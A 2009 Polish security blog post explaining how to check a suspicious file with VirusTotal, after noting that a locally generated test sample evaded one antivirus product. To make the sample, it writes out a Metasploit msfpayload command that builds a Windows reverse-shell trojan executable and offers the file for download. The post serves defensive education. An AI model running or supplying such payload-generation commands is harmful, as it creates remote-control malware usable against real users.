22 grudnia 2009
Jak sprawdzić, czy dany plik zawiera złośliwy kod?
wtorek, grudnia 22, 2009 | Autor:
\m/ojtek
Czasem zdarza się tak, że chcielibyśmy szybko sprawdzić czy dany plik nie zawiera czasem złośliwego kodu. Może się to przykładowo tyczyć podejrzanego załącznika do wiadomości e-mail, którą właśnie odebraliśmy. To, że nasz program antywirusowy niczego nie wykrył nie daje nam żadnej pewności, że plik jest w pełni bezpieczny. Może się przecież zdarzyć, że nasz program antywirusowy nie jest aktualny lub po prostu nie rozpoznaje akurat danego typu zagrożenia. Wszak na rynku istnieje co najmniej kilkadziesiąt różnych popularnych antywirusów, a każdy z nich dysponuje nieco innymi możliwościami.
Do zaprezentowania proponowanego przeze mnie sposobu postępowania w takich sytuacjach, posłużę się specjalnie do tego celu przygotowanym plikiem testowym. Plik utworzę w środowisku systemu BackTrack Linux LiveCD za pomocą następującego polecenia:
- ./msfpayload windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=31337 X > /tmp/test.exe
Powyższe polecenie, korzystając z modułu msfpayload będącego częścią pakietu Metasploit Framework, tworzy plik zawierający kod pozwalający w sprzyjających warunkach na przejęcie sterowania komputerem na którym zostanie on uruchomiony (czyli plik ten zawiera pewnego rodzaju konia trojańskiego). Osoby nieobeznane ze środowiskiem Metasploit nie muszą się zajmować jego poznawaniem, nasz spakowany testowy plik można pobrać tutaj.
Plik test.exe nie wzbudził żadnych wątpliwości programu antywirusowego ESET NOD32, który to pracuje na moim komputerze. My jednak wiemy przecież, że zawiera swego rodzaju złośliwy kod. Jak więc w prosty sposób poddać dalszej analizie tego rodzaju podejrzane pliki? Wykorzystamy w tym celu udostępnioną przez VirusTotal usługę online. Wystarczy tylko załadować nasz plik testowy poprzez formularz dostępny pod adresem http://www.virustotal.com/pl/. Po chwili plik zostanie przeskanowany przez kilkadziesiąt popularnych silników antywirusowych, a wyniki zostaną zaprezentowane w postaci czytelnej tabeli (zrzut ekranu poniżej). Nasz plik został oznaczony jako złośliwe oprogramowanie przez zaledwie 1 (AVG) z 41 silników antywirusowych dostępnych w ramach VirusTotal! Widać więc wyraźnie, że w razie wątpliwości warto skorzystać z takiej usługi, gdyż skorzystanie z tak wielu wiodących silników antywirusowych jednocześnie daje nam dużo większą szansę na odkrycie wszelkiego rodzaju zagrożeń.
Tego rodzaju analiza za pomocą usług dostępnych online może być przeprowadzana praktycznie przez każdego i nie wymaga praktycznie żadnej zaawansowanej wiedzy. Warto więc czasem w podobny sposób przyjrzeć się podejrzanym plikom, zanim uruchomimy je we własnym systemie!
Artykuł autorski HCSL - Wojciech Smol
Jak sprawdzić, czy dany plik zawiera złośliwy kod?
2009-12-22T22:02:00+01:00
\m/ojtek
Artykuły autorskie|Bezpieczeństwo danych|Bezpieczeństwo systemów operacyjnych|Narzędzia|Obrona - Atak|
Subskrybuj:
Komentarze do posta (Atom)
Wyszukaj w HCSL:
Subskrybuj:
Najpopularniejsze artykuły wszech czasów:
- Urządzenia do kopiowania kart płatniczych
- Co tak naprawdę ujawniasz w Internecie?
- Dlaczego należy zasłaniać klawiaturę bankomatu?
- Publiczna wiadomość z ukrytym przekazem
- Przyszłość antywirusów jest jasna
- Sposób na obejście internetowych blokad
- Superbezpieczne hasła na... żółtej karteczce
- Funkcje sprzętowego kasowania danych w HDD!
- 12-latek odkrył krytyczną lukę w Firefoksie
- Przestępstwo nie popłaca
- Czy jesteśmy inwigilowani przez chiński sprzęt?
- Gotowy zestaw do podsłuchiwania GSM
- Jak działa internetowa mafia?
- Uwaga na nowy rodzaj ataków phishingowych!
- Microsoftowy poradnik dla organów ścigania!
- Polski super-bezpieczny system Qubes OS
- Dane wieczyście dostępne
- Pierwszy atak samochodowych crackerów
- Pliki PDF zdolne do wykonania dowolnego kodu
- Polskie służby współpracują z firmą Google?
- Więzienie za odmowę ujawnienia hasła
- Podrzucanie dziecięcej pornografii
- Zapomniany film o hakerach
- Łamanie haseł w Windows Vista i 7